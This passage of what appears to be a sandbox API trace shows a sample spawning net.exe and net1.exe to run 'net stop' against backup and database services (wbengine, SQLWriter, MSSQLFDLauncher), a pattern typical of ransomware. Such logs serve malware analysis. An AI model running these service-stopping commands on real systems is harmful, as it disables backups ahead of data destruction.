0x436270 [0045.591] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 3521.\r\n", cchWideChar=52, lpMultiByteStr=0x436270, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 3521.\r\n started.\r\n", lpUsedDefaultChar=0x0) returned 52 [0045.591] WriteFile (in: hFile=0x26c, lpBuffer=0x436270*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x23fcf4, lpOverlapped=0x0 | out: lpBuffer=0x436270*, lpNumberOfBytesWritten=0x23fcf4*=0x34, lpOverlapped=0x0) returned 1 [0045.591] LocalFree (hMem=0x436270) returned 0x0 [0045.591] GetFileType (hFile=0x26c) returned 0x3 [0045.592] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x436270 [0045.592] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x436270, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nC", lpUsedDefaultChar=0x0) returned 2 [0045.592] WriteFile (in: hFile=0x26c, lpBuffer=0x436270*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23fcf4, lpOverlapped=0x0 | out: lpBuffer=0x436270*, lpNumberOfBytesWritten=0x23fcf4*=0x2, lpOverlapped=0x0) returned 1 [0045.592] LocalFree (hMem=0x436270) returned 0x0 [0045.592] NetApiBufferFree (Buffer=0x431c60) returned 0x0 [0045.592] NetApiBufferFree (Buffer=0x431c78) returned 0x0 [0045.592] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wbengine /y" [0045.592] exit (_Code=2) Process: id = "85" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x472aa000" os_pid = "0x888" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLWriter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 153 os_tid = 0x880 Process: id = "86" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x46dfb000" os_pid = "0x8d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "85" os_parent_pid = "0x888" cmd_line = "C:\\Windows\\system32\\net1 stop SQLWriter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 154 os_tid = 0x820 [0045.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2dfa40 | out: lpSystemTimeAsFileTime=0x2dfa40*(dwLowDateTime=0xe590ad40, dwHighDateTime=0x1d57a86)) [0045.906] GetCurrentProcessId () returned 0x8d8 [0045.906] GetCurrentThreadId () returned 0x820 [0045.906] GetTickCount () returned 0x114670d [0045.906] QueryPerformanceCounter (in: lpPerformanceCount=0x2dfa38 | out: lpPerformanceCount=0x2dfa38*=16619078270) returned 1 [0045.906] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0045.906] __set_app_type (_Type=0x1) [0045.906] __p__fmode () returned 0x74eb31f4 [0045.906] __p__commode () returned 0x74eb31fc [0045.907] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3cffe6) returned 0x0 [0045.907] __getmainargs (in: _Argc=0x3d9064, _Argv=0x3d906c, _Env=0x3d9068, _DoWildCard=0, _StartInfo=0x3d9024 | out: _Argc=0x3d9064, _Argv=0x3d906c, _Env=0x3d9068) returned 0 [0045.907] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0045.907] GetConsoleOutputCP () returned 0x1b5 [0045.907] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3d9080 | out: lpCPInfo=0x3d9080) returned 1 [0045.907] SetThreadUILanguage (LangId=0x0) returned 0x409 [0045.910] sprintf_s (in: _DstBuf=0x2df9f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0045.910] setlocale (category=0, locale=".437") returned="English_United States.437" [0045.912] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0045.912] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0045.912] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLWriter /y" [0045.912] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2df7c4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0045.912] RtlAllocateHeap (HeapHandle=0x7f0000, Flags=0x0, Size=0x66) returned 0x803c00 [0045.912] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0045.913] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2df9c8 | out: Buffer=0x2df9c8*=0x801c60) returned 0x0 [0045.913] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2df9c8 | out: Buffer=0x2df9c8*=0x801c78) returned 0x0 [0045.913] _fileno (_File=0x74eb2900) returned -2 [0045.913] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0045.913] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0045.913] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0045.913] _wcsicmp (_String1="config", _String2="stop") returned -16 [0045.913] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0045.913] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0045.913] _wcsicmp (_String1="file", _String2="stop") returned -13 [0045.913] _wcsicmp (_String1="files", _String2="stop") returned -13 [0045.913] _wcsicmp (_String1="group", _String2="stop") returned -12 [0045.913] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0045.913] _wcsicmp (_String1="help", _String2="stop") returned -11 [0045.913] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0045.913] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0045.913] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0045.913] _wcsicmp (_String1="session", _String2="stop") returned -15 [0045.913] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0045.913] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0045.913] _wcsicmp (_String1="share", _String2="stop") returned -12 [0045.913] _wcsicmp (_String1="start", _String2="stop") returned -14 [0045.913] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0045.913] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0045.913] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0045.913] _wcsicmp (_String1="accounts", _String2="SQLWriter") returned -18 [0045.913] _wcsicmp (_String1="computer", _String2="SQLWriter") returned -16 [0045.913] _wcsicmp (_String1="config", _String2="SQLWriter") returned -16 [0045.914] _wcsicmp (_String1="continue", _String2="SQLWriter") returned -16 [0045.914] _wcsicmp (_String1="cont", _String2="SQLWriter") returned -16 [0045.914] _wcsicmp (_String1="file", _String2="SQLWriter") returned -13 [0045.914] _wcsicmp (_String1="files", _String2="SQLWriter") returned -13 [0045.914] _wcsicmp (_String1="group", _String2="SQLWriter") returned -12 [0045.914] _wcsicmp (_String1="groups", _String2="SQLWriter") returned -12 [0045.914] _wcsicmp (_String1="help", _String2="SQLWriter") returned -11 [0045.914] _wcsicmp (_String1="helpmsg", _String2="SQLWriter") returned -11 [0045.914] _wcsicmp (_String1="localgroup", _String2="SQLWriter") returned -7 [0045.914] _wcsicmp (_String1="pause", _String2="SQLWriter") returned -3 [0045.914] _wcsicmp (_String1="session", _String2="SQLWriter") returned -12 [0045.914] _wcsicmp (_String1="sessions", _String2="SQLWriter") returned -12 [0045.914] _wcsicmp (_String1="sess", _String2="SQLWriter") returned -12 [0045.914] _wcsicmp (_String1="share", _String2="SQLWriter") returned -9 [0045.914] _wcsicmp (_String1="start", _String2="SQLWriter") returned 3 [0045.914] _wcsicmp (_String1="stats", _String2="SQLWriter") returned 3 [0045.914] _wcsicmp (_String1="statistics", _String2="SQLWriter") returned 3 [0045.914] _wcsicmp (_String1="stop", _String2="SQLWriter") returned 3 [0045.914] _wcsicmp (_String1="time", _String2="SQLWriter") returned 1 [0045.914] _wcsicmp (_String1="user", _String2="SQLWriter") returned 2 [0045.914] _wcsicmp (_String1="users", _String2="SQLWriter") returned 2 [0045.914] _wcsicmp (_String1="msg", _String2="SQLWriter") returned -6 [0045.914] _wcsicmp (_String1="messenger", _String2="SQLWriter") returned -6 [0045.914] _wcsicmp (_String1="receiver", _String2="SQLWriter") returned -1 [0045.914] _wcsicmp (_String1="rcv", _String2="SQLWriter") returned -1 [0045.914] _wcsicmp (_String1="netpopup", _String2="SQLWriter") returned -5 [0045.914] _wcsicmp (_String1="redirector", _String2="SQLWriter") returned -1 [0045.914] _wcsicmp (_String1="redir", _String2="SQLWriter") returned -1 [0045.914] _wcsicmp (_String1="rdr", _String2="SQLWriter") returned -1 [0045.914] _wcsicmp (_String1="workstation", _String2="SQLWriter") returned 4 [0045.914] _wcsicmp (_String1="work", _String2="SQLWriter") returned 4 [0045.914] _wcsicmp (_String1="wksta", _String2="SQLWriter") returned 4 [0045.914] _wcsicmp (_String1="prdr", _String2="SQLWriter") returned -3 [0045.914] _wcsicmp (_String1="devrdr", _String2="SQLWriter") returned -15 [0045.914] _wcsicmp (_String1="lanmanworkstation", _String2="SQLWriter") returned -7 [0045.914] _wcsicmp (_String1="server", _String2="SQLWriter") returned -12 [0045.914] _wcsicmp (_String1="svr", _String2="SQLWriter") returned 5 [0045.914] _wcsicmp (_String1="srv", _String2="SQLWriter") returned 1 [0045.915] _wcsicmp (_String1="lanmanserver", _String2="SQLWriter") returned -7 [0045.915] _wcsicmp (_String1="alerter", _String2="SQLWriter") returned -18 [0045.915] _wcsicmp (_String1="netlogon", _String2="SQLWriter") returned -5 [0045.915] _wcsupr (in: _String="SQLWriter" | out: _String="SQLWRITER") returned="SQLWRITER" [0045.915] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x8054b8 [0045.918] GetServiceKeyNameW (in: hSCManager=0x8054b8, lpDisplayName="SQLWRITER", lpServiceName=0x3daaf0, lpcchBuffer=0x2df964 | out: lpServiceName="", lpcchBuffer=0x2df964) returned 0 [0045.918] _wcsicmp (_String1="msg", _String2="SQLWRITER") returned -6 [0045.918] _wcsicmp (_String1="messenger", _String2="SQLWRITER") returned -6 [0045.918] _wcsicmp (_String1="receiver", _String2="SQLWRITER") returned -1 [0045.918] _wcsicmp (_String1="rcv", _String2="SQLWRITER") returned -1 [0045.918] _wcsicmp (_String1="redirector", _String2="SQLWRITER") returned -1 [0045.918] _wcsicmp (_String1="redir", _String2="SQLWRITER") returned -1 [0045.918] _wcsicmp (_String1="rdr", _String2="SQLWRITER") returned -1 [0045.918] _wcsicmp (_String1="workstation", _String2="SQLWRITER") returned 4 [0045.918] _wcsicmp (_String1="work", _String2="SQLWRITER") returned 4 [0045.918] _wcsicmp (_String1="wksta", _String2="SQLWRITER") returned 4 [0045.918] _wcsicmp (_String1="prdr", _String2="SQLWRITER") returned -3 [0045.918] _wcsicmp (_String1="devrdr", _String2="SQLWRITER") returned -15 [0045.918] _wcsicmp (_String1="lanmanworkstation", _String2="SQLWRITER") returned -7 [0045.918] _wcsicmp (_String1="server", _String2="SQLWRITER") returned -12 [0045.918] _wcsicmp (_String1="svr", _String2="SQLWRITER") returned 5 [0045.918] _wcsicmp (_String1="srv", _String2="SQLWRITER") returned 1 [0045.918] _wcsicmp (_String1="lanmanserver", _String2="SQLWRITER") returned -7 [0045.918] _wcsicmp (_String1="alerter", _String2="SQLWRITER") returned -18 [0045.919] _wcsicmp (_String1="netlogon", _String2="SQLWRITER") returned -5 [0045.919] NetServiceControl (in: servername=0x0, service="SQLWRITER", opcode=0x0, arg=0x0, bufptr=0x2df960 | out: bufptr=0x2df960) returned 0x889 [0045.919] wcscpy_s (in: _Destination=0x3da4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0045.919] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0045.920] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3db338, nSize=0x800, Arguments=0x3d9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0045.921] GetFileType (hFile=0x26c) returned 0x3 [0045.921] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x803fe8 [0045.921] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x803fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0045.921] WriteFile (in: hFile=0x26c, lpBuffer=0x803fe8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2df8a0, lpOverlapped=0x0 | out: lpBuffer=0x803fe8*, lpNumberOfBytesWritten=0x2df8a0*=0x1e, lpOverlapped=0x0) returned 1 [0045.921] LocalFree (hMem=0x803fe8) returned 0x0 [0045.921] GetFileType (hFile=0x26c) returned 0x3 [0045.921] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x806290 [0045.921] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x806290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x80", lpUsedDefaultChar=0x0) returned 2 [0045.921] WriteFile (in: hFile=0x26c, lpBuffer=0x806290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2df8a0, lpOverlapped=0x0 | out: lpBuffer=0x806290*, lpNumberOfBytesWritten=0x2df8a0*=0x2, lpOverlapped=0x0) returned 1 [0045.921] LocalFree (hMem=0x806290) returned 0x0 [0045.921] _ultow (in: _Dest=0x889, _Radix=3012816 | out: _Dest=0x889) returned="2185" [0045.921] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3db338, nSize=0x800, Arguments=0x3d9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0045.922] GetFileType (hFile=0x26c) returned 0x3 [0045.922] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x806290 [0045.922] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x806290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0045.922] WriteFile (in: hFile=0x26c, lpBuffer=0x806290*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2df8ac, lpOverlapped=0x0 | out: lpBuffer=0x806290*, lpNumberOfBytesWritten=0x2df8ac*=0x34, lpOverlapped=0x0) returned 1 [0045.922] LocalFree (hMem=0x806290) returned 0x0 [0045.922] GetFileType (hFile=0x26c) returned 0x3 [0045.922] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x806290 [0045.922] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x806290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x80", lpUsedDefaultChar=0x0) returned 2 [0045.922] WriteFile (in: hFile=0x26c, lpBuffer=0x806290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2df8ac, lpOverlapped=0x0 | out: lpBuffer=0x806290*, lpNumberOfBytesWritten=0x2df8ac*=0x2, lpOverlapped=0x0) returned 1 [0045.922] LocalFree (hMem=0x806290) returned 0x0 [0045.922] NetApiBufferFree (Buffer=0x801c60) returned 0x0 [0045.922] NetApiBufferFree (Buffer=0x801c78) returned 0x0 [0045.922] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLWriter /y" [0045.922] exit (_Code=2) Process: id = "87" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x46aaf000" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLFDLauncher$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 155 os_tid = 0x3d0 Process: id = "88" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x47590000" os_pid = "0x8f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "87" os_parent_pid = "0x828" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 156 os_tid = 0x8f8 [0046.157] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f80c | out: lpSystemTimeAsFileTime=0x24f80c*(dwLowDateTime=0xe5b6c340, dwHighDateTime=0x1d57a86)) [0046.157] GetCurrentProcessId () returned 0x8f0 [0046.157] GetCurrentThreadId () returned 0x8f8 [0046.157] GetTickCount () returned 0x1146807 [0046.157] QueryPerformanceCounter (in: lpPerformanceCount=0x24f804 | out: lpPerformanceCount=0x24f804*=16644178756) returned 1 [0046.157] GetModuleHandleA (lpModuleName=0x0) returned 0xc50000 [0046.157] __set_app_type (_Type=0x1) [0046.157] __p__fmode () returned 0x74eb31f4 [0046.157] __p__commode () returned 0x74eb31fc [0046.158] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc5ffe6) returned 0x0 [0046.158] __getmainargs (in: _Argc=0xc69064, _Argv=0xc6906c, _Env=0xc69068, _DoWildCard=0, _StartInfo=0xc69024 | out: _Argc=0xc69064, _Argv=0xc6906c, _Env=0xc69068) returned 0 [0046.158] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.158] GetConsoleOutputCP () returned 0x1b5 [0046.158] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc69080 | out: lpCPInfo=0xc69080) returned 1 [0046.158] SetThreadUILanguage (LangId=0x0) returned 0x409 [0046.161] sprintf_s (in: _DstBuf=0x24f7c4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0046.161] setlocale (category=0, locale=".437") returned="English_United States.437" [0046.163] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0046.163] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0046.163] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPS /y" [0046.163] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f590, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0046.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2c3c20 [0046.164] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0046.164] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x24f794 | out: Buffer=0x24f794*=0x2c1c80) returned 0x0 [0046.164] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x24f794 | out: Buffer=0x24f794*=0x2c1c98) returned 0x0 [0046.164] _fileno (_File=0x74eb2900) returned -2 [0046.164] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0046.164] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0046.164] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0046.164] _wcsicmp (_String1="config", _String2="stop") returned -16 [0046.164] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0046.164] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0046.164] _wcsicmp (_String1="file", _String2="stop") returned -13 [0046.164] _wcsicmp (_String1="files", _String2="stop") returned -13 [0046.164] _wcsicmp (_String1="group", _String2="stop") returned -12 [0046.164] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0046.164] _wcsicmp (_String1="help", _String2="stop") returned -11 [0046.164] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0046.164] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0046.164] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0046.164] _wcsicmp (_String1="session", _String2="stop") returned -15 [0046.164] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0046.164] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0046.164] _wcsicmp (_String1="share", _String2="stop") returned -12 [0046.164] _wcsicmp (_String1="start", _String2="stop") returned -14 [0046.164] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0046.164] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0046.164] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0046.165] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$TPS") returned -12 [0046.165] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$TPS") returned -10 [0046.165] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$TPS") returned -10 [0046.165] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$TPS") returned -10 [0046.165] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$TPS") returned -10 [0046.165] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$TPS") returned -7 [0046.165] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$TPS") returned -7 [0046.165] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$TPS") returned -6 [0046.165] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$TPS") returned -6 [0046.165] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$TPS") returned -5 [0046.165] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$TPS") returned -5 [0046.165] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$TPS") returned -1 [0046.165] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$TPS") returned 3 [0046.165] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.165] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.165] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.165] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.165] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.165] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.165] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.165] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.165] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$TPS") returned 7 [0046.165] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$TPS") returned 8 [0046.165] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$TPS") returned 8 [0046.165] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$TPS") returned -12 [0046.165] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$TPS") returned -14 [0046.165] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$TPS") returned 5 [0046.165] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$TPS") returned 5 [0046.165] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$TPS") returned 1 [0046.165] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$TPS") returned 5 [0046.165] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$TPS") returned 5 [0046.165] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$TPS") returned 5 [0046.165] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$TPS") returned 10 [0046.165] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$TPS") returned 10 [0046.165] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$TPS") returned 10 [0046.165] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$TPS") returned 3 [0046.165] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$TPS") returned -9 [0046.165] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$TPS") returned -1 [0046.166] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.166] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.166] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$TPS") returned 6 [0046.166] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$TPS") returned -1 [0046.166] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$TPS") returned -12 [0046.166] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$TPS") returned 1 [0046.166] _wcsupr (in: _String="MSSQLFDLauncher$TPS" | out: _String="MSSQLFDLAUNCHER$TPS") returned="MSSQLFDLAUNCHER$TPS" [0046.166] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2c54f0 [0046.168] GetServiceKeyNameW (in: hSCManager=0x2c54f0, lpDisplayName="MSSQLFDLAUNCHER$TPS", lpServiceName=0xc6aaf0, lpcchBuffer=0x24f730 | out: lpServiceName="", lpcchBuffer=0x24f730) returned 0 [0046.169] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$TPS") returned -12 [0046.169] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$TPS") returned -14 [0046.169] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$TPS") returned 5 [0046.169] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$TPS") returned 5 [0046.169] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$TPS") returned 5 [0046.169] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$TPS") returned 5 [0046.169] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$TPS") returned 5 [0046.169] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$TPS") returned 10 [0046.169] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$TPS") returned 10 [0046.169] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$TPS") returned 10 [0046.169] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$TPS") returned 3 [0046.169] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$TPS") returned -9 [0046.169] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$TPS") returned -1 [0046.169] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$TPS") returned 6 [0046.169] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$TPS") returned 6 [0046.169] _wcsicmp (_String1="srv", 